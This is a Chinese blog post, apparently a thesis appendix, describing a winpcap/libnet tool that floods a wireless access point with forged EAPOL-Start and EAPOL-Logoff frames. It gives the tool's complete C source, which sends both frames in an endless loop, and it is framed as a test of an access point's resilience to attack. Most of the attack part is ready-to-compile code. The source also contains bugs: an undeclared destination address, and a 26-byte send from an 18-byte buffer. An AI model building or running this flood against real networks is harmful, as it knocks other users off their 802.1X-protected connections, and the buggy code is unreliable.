利用winpcap/libnet开发EAPOL-START/LOGOFF攻击测试工具

已于 2023-10-29 10:32:22 修改
阅读量4.5k 收藏 4
点赞数
分类专栏: 编程开发 文章标签: 测试工具 null 工具 测试 struct dst
于 2006-06-08 09:29:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gofishing/article/details/779717
版权
   攻击工具的原理是通过不断地向WLAN AP发送EAPOL-Start和EAPOL-Logoff报文,从而使WLAN AP的状态机中频繁刷新网卡的状态。这个测试工具可以用来测试WLAN AP的性能和抗攻击的能力。
    程序中除了主函数外,有以下5个函数:
u_char *get_src_mac();
u_char *eapol_create_start_stop_frame(char stst);
char *send_frame(u_char *frame_ptr, int frame_size);
void txStart();
void txLogoff();
    其中,get_src_mac()函数的作用是获取本地无线网卡的mac,注意攻击之前无线网卡要连上WLAN AP。eapol_create_start_stop_frame(char stst)函数根据输入参数的不同可以选择构造EAPOL-Start和EAPOL-Logoff报文。send_frame(u_char *frame_ptr, int frame_size)函数负责数据包的发送。void txStart()和void txLogoff()两个函数调用其它函数完成EAPOL-Start和EAPOL-Logoff报文的发送过程。
通过对无线报文进行抓包,可以看到试验的结果如图4-13所示:
          
  图4-13 EAPOL-Start/Logoff报文攻击的过程

从抓包结果可以看出,当无线网卡发送EAPOL-Start报文时,WLAN AP做出了回应EAP-Request。由于不同WLAN AP对报文的响应时间可能不同。因此可以通过调整EAPOL-Start和EAPOL-Logoff报文之间的发送时间来达到最大的测试效果。在这里可以使用Sleep(int n)函数来实现,n的单位为毫秒。

附录C EAPOL_START攻击测试工具的源代码

EAPOL-START攻击工具的源代码如下所示:
// EAPOL_START_ATTACK.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "stdio.h"
#include <win32/libnet.h>
#define ETH_ADDR_LEN 6
#define EAPOL_START     1
#define EAPOL_LOGOFF   2
typedef unsigned char u_char;
libnet_t *l=NULL;
//得到本地网卡的mac地址
u_char *get_src_mac()
{
u_char *ret_mac=NULL;
struct libnet_ether_addr *e;
e = libnet_get_hwaddr(l);
ret_mac = (u_char *)malloc(ETH_ADDR_LEN);/*分配一块mac地址的存储单元*/
memcpy(ret_mac, e->ether_addr_octet, ETH_ADDR_LEN);
return (u_char *)ret_mac;
}
//构造EAPOL-Start和EAPOL-Logoff报文的函数,当stst的值为EAPOL_START时构造EAPOL-Start报文,当stst的值为EAPOL_LOGOFF时构造的是EAPOL-Logoff函数。
u_char *eapol_create_start_stop_frame(char stst)
{
u_char static * eapol_start;
u_char *src_addr;
eapol_start = (u_char *)malloc(18);  //为EAPOL-START报文分配18字节的空间
memcpy(eapol_start, eapol_dst, 6); // 拷贝目的地址
src_addr = get_src_mac();
memcpy(&eapol_start[6], src_addr, 6);  //拷贝源地址
free(src_addr);
src_addr = NULL;
eapol_start[12] = 0x88;           // 0x888e 是EAPOL帧类型
eapol_start[13] = 0x8e;
eapol_start[14] = 1;                   // EAPOL的版本
eapol_start[15] = stst;              //定义发送的报文类型
eapol_start[16] = 0;                   // 没有负载.
eapol_start[17] = 0;
return eapol_start;
}
//发送报文的函数,函数的形参是指向一个待发送数据包的指针
char *send_frame(u_char *frame_ptr, int frame_size)
{
if(frame_ptr[23]==0xcd)
        frame_ptr[23]=0x00;
int i=0;
if ((i = libnet_write_link(l,frame_ptr,frame_size)) == -1)
        return ("Error sending frame");
return NULL;
}
//发送EAPOL-Start报文
void txStart()
{
 printf("send txStart/n");   
 u_char *temp;
 temp = eapol_create_start_stop_frame(EAPOL_START);
 if (send_frame(temp, 26) == NULL)
     printf("send eap_start to link./n");
 free(temp);
 temp = NULL;
}
//发送EAPOL-Logoff报文
void txLogoff()
{
printf("send txLogoff/n");   
u_char *temp;
temp = eapol_create_start_stop_frame(EAPOL_LOGOFF);
send_frame(temp, 18);
free(temp);
temp = NULL;
}
//EAPOL-Start/Logoff攻击工具的主函数
void main(int argc, char** argv)
{
char *device=NULL;
char error_information[LIBNET_ERRBUF_SIZE];
printf("EAPOL_START攻击开始:/n");
while (1) {
        l=libnet_init(LIBNET_LINK_ADV,device,error_information);    
        txStart();
        Sleep(10);
        txLogoff();
        libnet_destroy(l);
        Sleep(10);
}
}
gofishing
关注
专栏目录
《网络安全自学教程》- 802.1x协议
wangyuxiang946的博客
10-16 2万+
802.1x协议架构,工作原理/认证流程,认证方式,MAB认证,触发认证的三种方式,EAP报文格式,EAPOL报文格式
EAPOL--基于局域网的拓展认证协议
Javin_L的博客
09-29 919
EAP是Extensible Authentication Protocol的缩写,EAPOL就是(EAP OVER LAN )基于局域网的扩展认证协议。 EAPOL是基于802.1X网络访问认证技术发展而来的。 定义: EAP是Extensible Authentication Protocol的缩写。 EAP是一个普遍使用的认证机制,它常被用于无线网络或点到点的连接中。EAP不仅可以用于...
epoll源码分析
最新发布
weixin_46267443的博客
06-03 1125
【代码】epoll源码分析。
【网络安全】802.1X技术基础
错位竞争,单点突破。
11-29 8445
1 前言 802.1X作为一种基于端口的用户访问控制安全机制,因其低成本、良好的业务连续性和扩充性以及较高的安全性和灵活性,自从2001年6月正式成为IEEE 802系列标准以来便迅速受到了设备制造商、各大网络运营商和最终用户的广泛支持和肯定。 那么802.1X从何而来?有什么作用?体系结构是怎么样的?用到什么协议?并且又是如何实现的?这些都将是我们本文讨论的内容。 2 802.1X起源
身份认证——802.1x认证和MAC认证讲解
m0_49864110的博客
03-16 1万+
用户通过802.1x客户端输入用户和密码来向接入设备发送EAPoL-Start报文来触发认证,接入控制器收到客户端发送的EAPoL-Start报文之后,会向客户端发送EAP-Request/Identity报文,要求用户发送身份标识。EAP中继方式中,用来对用户密码进行加密处理的挑战字由认证服务器生成,设备端只是负责将EAP报文封装在RADIUS报文中透传认证服务器,整个认证处理都由认证服务器来完成。其实就是接入控制端主动触发进行802.1x认证,不过不通过用户密码认证了,而是通过MAC进行认证。
WinPcap-4-1-3.exe 安装包 WpdPack-4-1-2.zip 开发依赖包
03-24
WinPcap-4-1-3.exe 和 WpdPack-4-1-2.zip 是两个在IT领域中,特别是网络编程和数据包捕获时常用的工具。这两个文件都是与WinPcap相关的,WinPcapWindows Packet Capture)是一个开源的Windows平台上的数据包捕获和...
WinPcap-4-1-3安装包 win32/64都可以
03-08
3. **网络注入**:除了捕获数据包,WinPcap还能够创建和发送自定义的数据包到网络中,这在测试网络协议、模拟攻击开发网络应用时十分实用。 4. **统计和网络监控**:WinPcap提供了一系列统计函数,可以分析网络...
WinPcap和Sim-EKB-Install.rar
04-07
使用后者必须在安装软件时勾选NPCap(4.0版本使用,早期使用WinPCap); ②用来设置TCP/IP的通信方式,有本地和以太网两种。如果是在两台电脑之间实现仿真,需选择<以太网>; ③调整虚拟时间:通过调整该参数,可...
Winpcap 信息截获.rar_arp_hack_winpcap_winpcap 数据包内容_winpcap-pcap
09-21
关于“winpcap-pcap”,这里指的是Winpcap库使用的数据格式——libpcap/pcap格式。这是一种通用的数据包捕获文件格式,可以记录网络活动以便后期分析。Winpcap捕获的数据通常会保存在这种格式的文件中,便于使用像...
原始pcap文件
10-07
《使用libpcap库过滤pcap文件中的数据包》文章中使用的原始输入文件。
EAP编写的实用测试
02-11
EAP编写的实用测试
H3C-802.1X
m0_68698993的博客
07-20 287
802.1X,全称为Port-Based Networks Access Control,即基于端口的网络访问控制,它起源于无线网络标准802.11协议,802.11协议是标准的无线局域网协议,802.1X协议设计的最初的目的是为了解决无线局域网用户的接入认证问题。802.1X可以防止未经授权的用户访问网络,同时保护用户数据的安全性。认证服务器通常为Radius服务器,该服务器可以存储有关用户的认证、计费、业务信息,比如用户所属的VLAN、CAR参数、优先级、用户的访问控制列表等等。
【转】 IEEE 802.1X-PEAP认证过程分析(抓包)
anren7769的博客
06-12 557
转自:https://blog.csdn.net/u012503786/article/details/79296522 IEEE 802.1X-PEAP认证过程分析(抓包)本文介绍IEEE802.1X认证的PEAP认证方式,是带有radius服务器的EAP中继认证。IEEE802.1X认证是使用EAP报文格式在申请者和认证者之间交换信息。带有radius服务器,即认证者不对...
学一点Wi-Fi:EAP & EAPOL
qq_23087099的博客
05-19 6826
1. EAP EAP其实并不是WiFi专有的协议,但在802.1X认证中经常碰到EAP,而且自己老是把一些相关的概念搞混淆,所以还是得做做笔记。 EAP,全称Extensible Authentication Protocol,是一个认证框架,这个框架一种简单的request/response方式,传递认证算法(EAP method)所需要的信息并完成认证。 2. EAP中的常见概念 Supplicant:向Authenticator申请认证的一方,和Peer是一个概念 Authenticator
802.1X协议的工作机制流程详解
曾梦想仗剑走天涯
07-20 2万+
802.1X协议的工作机制流程详解 802.1X协议是一种基于端口的网络接入控制协议,“基于端口的网络接入控制”是指在局域网接入设备的端口这一级,对所接入的用户设备进行认证和控制。作为一个认证协议,802.1X在实现的过程中有很多重要的工作机制。下图显示了802.1X协议的基本原理: Supplicant发出一个连接请求(EPAoL,ExtensibleAuthentication Pro
EAPOL
printf_mylife的专栏
02-18 1万+
EAP(Extensible Authentication Protocol),可扩展认证协议,是一种普遍使用的支持多种认证方法的认证框架协议,主要用于网络接入认证。该协议一般运行在数据链路层上,即可以直接运行于PPP或者IEEE 802之上,不必依赖于IP。EAP可应用于无线、有线网络中。          EAP的架构非常灵活,在Authenticator(认证方)和Supplicant(客
Win10 无线网络802.1X认证 PEAP问题
热门推荐
醉陌浮生,乱谜浊
09-28 2万+
无线网络802.1X认证故障问题现象: 当升级Windows10 后,无法连接到的 WPA-2 企业网络(尤其是校园网),即使用证书进行服务器端或相互身份的验证 (EAP-TLS,PEAP TTLS)。 解决方案: 联系对应的Radius 服务器供应商做TLS1.2的修复。 对于锐捷厂商的客户,锐捷已经对TLS1.2进行了修复,可以拨打锐捷远程支持中心(400811100)进行障碍处理。 针
使用抓包软件解决无线登录故障
weixin_34043301的博客
03-27 133
在解决一些复杂网络故障的时候,使用抓包软件抓取协议包进行分析,会得到比较清晰的结果。以下用Radius服务器导致的无线网络故障来说明:办公区域无线网络覆盖,使用Radius验证连接访问文件服务器以及域内的其他资源。某天无线网络能正常连接,但在使用无线网络访问域内的文件服务器、邮箱等其他资源的时候无法访问。用Ping命令Ping文件服务器和邮件服务器回包正常,判断网络正常。此时...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值